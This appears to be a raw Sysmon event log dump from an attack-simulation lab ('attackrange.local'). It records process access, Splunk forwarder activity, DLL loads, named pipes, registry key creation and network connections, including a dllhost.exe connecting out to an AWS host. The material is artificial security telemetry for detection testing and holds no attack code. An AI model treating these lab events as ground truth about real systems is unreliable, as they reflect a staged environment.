17:30:23.052{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061153Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:23.052{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001530923Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:22.588{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local64687-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 12241200x80000000000000001530922Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:24.591{21761711-ECEC-607E-FA30-00000000BB01}6344C:\Windows\SysWOW64\dllhost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x80000000000000001530921Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:24.588{21761711-ECEC-607E-FA30-00000000BB01}6344C:\Windows\SysWOW64\dllhost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 11241100x80000000000000001530920Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:24.438{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530919Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:24.438{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2AF26F2C529577CBD098C8F38B50FD5,SHA256=BD2D45B65ACA10A91D6D1BC58AE142DEE46841AEB7D4DD452BD295BD58207941falsefalse - insufficient disk space 354300x80000000000000001061160Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:19.851{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1297-false10.0.1.12-8000- 23542300x80000000000000001061159Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:24.179{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89BBA459AEACD1E4538BDE62E8A38CCA,SHA256=2B4A88FE112575BD8C6B04A49656D5E00457D5937FEDFEAD5E7B15F163411C0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061158Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:24.128{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0303160EA56CD6346D4788865E41358,SHA256=F9AA7FA5E830FCFADDF826D30DAECC5698267C21F14CD81F64AA153099D88B92,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001530918Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:24.121{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001530917Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:24.121{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADDC93EA7E61AB5790082DCF97B8E3F6,SHA256=7CC45D0B171656F3C873C40CADCF09E3B956629E44DD603FFF0F927FF70FC078falsefalse - insufficient disk space 11241100x80000000000000001530916Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:24.121{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001530915Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:24.121{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B5E2EFEA49FE7926953F5CBF7641276C,SHA256=661C31555345C45868DBB7729102532591BAFB3905C617A6301B3A519C19BD72falsefalse - insufficient disk space 10341000x80000000000000001061157Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:24.053{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061156Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:24.053{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530927Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:25.609{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001530926Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:25.609{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADDC93EA7E61AB5790082DCF97B8E3F6,SHA256=7CC45D0B171656F3C873C40CADCF09E3B956629E44DD603FFF0F927FF70FC078falsefalse - insufficient disk space 11241100x80000000000000001530925Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:25.540{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530924Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:25.540{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C4BE269515654A41B50B6F7526C32C1,SHA256=4BC5909D7A4AF423F4C074DDFA9B74315FDFAFCD59FE71375090A6E8CA8FF38Bfalsefalse - insufficient disk space 23542300x80000000000000001061164Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:25.255{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C6FC6CF9CFB476A9D2B18FEB5417C64,SHA256=67E91D0BAD160E0E9B29377C717AA5967B269A1E9654BA96598A3F7EF51DA366,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061163Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:25.134{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F793E967CDBDBB75D97691FED5BD21C,SHA256=95D85CEC0260B35FECF27C7AB7B1BBA28FD82A0BFD5D5E41FE913E05DCD20E3E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061162Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:25.054{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061161Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:25.054{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001530930Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:24.142{21761711-ECEC-607E-FA30-00000000BB01}6344C:\Windows\SysWOW64\dllhost.exeWIN-HOST-5\Administratortcptruefalse10.0.1.15win-host-5.attackrange.local64688-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 11241100x80000000000000001530929Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:26.643{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530928Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:26.643{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0E4DBB266B66B753722E558141A82A1,SHA256=593A3CDF1BC0CBEBE29871F2CF10955FD7E652048162123A48A04F6604BE1B25falsefalse - insufficient disk space 354300x80000000000000001061169Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.699{761B69BB-818A-607D-0B00-00000000BA01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local1298-true0:0:0:0:0:0:0:1win-dc-982.attackrange.local389ldap 354300x80000000000000001061168Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.698{761B69BB-819C-607D-2400-00000000BA01}2752C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local1298-true0:0:0:0:0:0:0:1win-dc-982.attackrange.local389ldap 23542300x80000000000000001061167Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:26.142{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DBF38EAA388059248B4F6FDDA73429A,SHA256=B67DC67719F5A6EBDAEA0B1977D9D4C4E47ADB73832F9DA3934EE61AD7413A86,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061166Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:26.055{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061165Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:26.055{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530988Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.930{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530987Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.930{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7C675B857139EDB76807F811B3D9F80,SHA256=87793CAD42184FBADEDC19BF9155DCA553C7150658BCB1BD4FB6A19AFF597D02falsefalse - insufficient disk space 23542300x80000000000000001061172Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:27.148{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE81213C7943B14C22F781B8AC02D6A4,SHA256=91A698D1675265ED24912017D34EC7074D681B10463490044EBEB246E0C03425,IMPHASH=00000000000000000000000000000000falsetrue 534500x80000000000000001530986Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.244{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001530985Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.244{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001530984Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.244{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001530983Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.244{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001530982Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.113{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001530981Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.113{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001530980Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.113{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001530979Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:27.113{21761711-6133-6080-BF5D-00000000BB01}5264\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001530978Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.113{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001530977Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:27.113{21761711-6133-6080-BF5D-00000000BB01}5264\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001530976Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.113{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001530975Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.113{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001530974Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.113{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001530973Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.113{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001530972Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.113{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001530971Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.113{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001530970Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001530969Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001530968Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 